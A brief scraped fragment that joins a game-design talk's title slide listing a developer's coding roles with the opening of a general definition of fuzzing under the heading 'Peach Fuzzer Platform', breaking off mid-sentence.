Game Design From Concepts To Implementation Giacomo Cappellini - [email protected] What I do I code for video games I code editor tools I code utilities for the production of games I code scripts
Peach Fuzzer Platform
Fuzzing is a software testing technique that introduces invalid, malformed, or random data to parts of a computer system, such as files, network packets, environment variables, or memory. How the tested